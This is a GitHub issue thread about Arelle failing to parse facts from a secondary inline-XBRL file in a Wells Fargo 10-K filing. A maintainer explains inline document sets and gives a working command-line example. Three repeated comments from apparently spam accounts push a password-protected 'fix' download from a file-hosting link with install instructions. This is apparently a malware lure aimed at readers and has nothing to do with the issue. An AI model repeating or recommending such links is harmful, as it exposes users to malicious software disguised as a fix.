### ISSUE TITLE
Parsing facts for secondary(?) 10-K documents

### ISSUE THREAD

**Issue by stephenweaver** [Arelle/Arelle#1329]
### Diagnostic Details
```{'arch': 'AMD64',
 'arelle_version': '2.30.25',
 'args': ['arelleCmdLine.exe', '--diagnostic'],
 'cgi': False,
 'docker': False,
 'filesystem': True,
 'gae': False,
 'os_name': 'Windows',
 'os_version': '11',
 'python_branch': 'tags/v3.12.5',
 'python_compiler': 'MSC v.1940 64 bit (AMD64)',
 'python_implementation': 'CPython',
 'python_version': '3.12.5',
 'python_virtualenv': False,
 'system_word_size': 64,
 'webserver': True
```
### Background and defining secondary documents
Hey team, been using this for a personal project and it's been amazing. I seem to be having an issue with parsing what I'm going to call secondary documents for lack of a better term. These docs are included in filing, but show up as a tab in the SEC filing viewer.
An example can be seen in all the most recent 10-K's that Wells Fargo has filed. In this example (filing data attached) `wfc-20231231.htm` is the declared primary document, and `wfc-20231231_d2.htm` is the one with all facts that are meaningful to me including all the consolidated reports. This document with the `_d2` is what I'm calling a secondary document.

Here's a link to the SEC's filing viewer and a screenshot of this example:
* https://www.sec.gov/ix?doc=/Archives/edgar/data/0000072971/000007297124000064/wfc-20231231.htm

![Screenshot 2024-08-25 113633](https://github.com/user-attachments/assets/8497befe-5278-4d9b-b8fc-ea6a5ccfbe52)

### Steps to reproduce 
1. Download and unzip the attached 0000072971-24-000064-xbrl.zip file.
2. Start Arelle webserver "C:\Program Files\Arelle\arelleCmdLine.exe" --webserver
3. Try the parsing the facts from the primary document (updating file path and port)
http://localhost:8080/rest/xbrl/view?file=C:\Users\USER\Downloads\0000072971-24-000064-xbrl\wfc-20231231.htm&view=facts&factListCols=Label,Name,contextRef,unitRef,Dec,Prec,Value,Period,Dimensions&media=xml
4. Note that only the facts from wfc-20231231.htm are present as probably expected. ✅  
5. Try the parsing the facts from secondary document (`wfc-20231231_d2`) 
http://localhost:8080/rest/xbrl/view?file=C:\Users\USER\Downloads\0000072971-24-000064-xbrl\wfc-20231231_d2.htm&view=facts&factListCols=Label,Name,contextRef,unitRef,Dec,Prec,Value,Period,Dimensions&media=xml
6. Note that only the response seen is just an list of empty fact name with no values as shown below ❌ 

### Unexpected Behavior 
![image](https://github.com/user-attachments/assets/726c70e2-47eb-400e-a3cd-ee8dbc5f744d)

### Questions
* Is there real name for what I've called "secondary" documents?
* Is this behavior intended?
* Are there any known workarounds to parse facts reported like this?

Thanks for taking the time to look into this and I'm looking forward to hearing back.
Cheers

### Documents

[0000072971-24-000064-xbrl.zip](https://github.com/user-attachments/files/16755801/0000072971-24-000064-xbrl.zip)

### If running from the command line, what command did you run?

C:\Program Files\Arelle\arelleCmdLine.exe" --webserver

### Interface

CLI (arelleCmdLine)

### Version

2.30.25

### Download

GitHub release (bundled Python)

### Operating System

Windows

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by austinmatherne-wk** [comment]
Hi Stephen,

The secondary document you're referring to is part of an inline document set (along with the primary document). On its own it does not have a reference to an XBRL taxonomy. An XBRL processor (Arelle or any other) needs to be provided with both the primary document and secondary documents to load any of the secondary docs. Getting this working from the web server is going to be difficult (impossible?). The GUI can help you discover the iXDS files when opening the zip.

The syntax for loading from the CLI looks like this:
`python arelleCmdLine.py --plugins 'inlineXbrlDocumentSet|transforms/SEC' --file '[{"ixds": [{"file": "https://www.sec.gov/Archives/edgar/data/72971/000007297124000064/0000072971-24-000064-xbrl.zip/wfc-20231231.htm"}, {"file": "https://www.sec.gov/Archives/edgar/data/72971/000007297124000064/0000072971-24-000064-xbrl.zip/wfc-20231231_d2.htm"}]}]'`

There's active work on improving this so you can simply pass the zip and it will discover all inline files and load them as a document set.
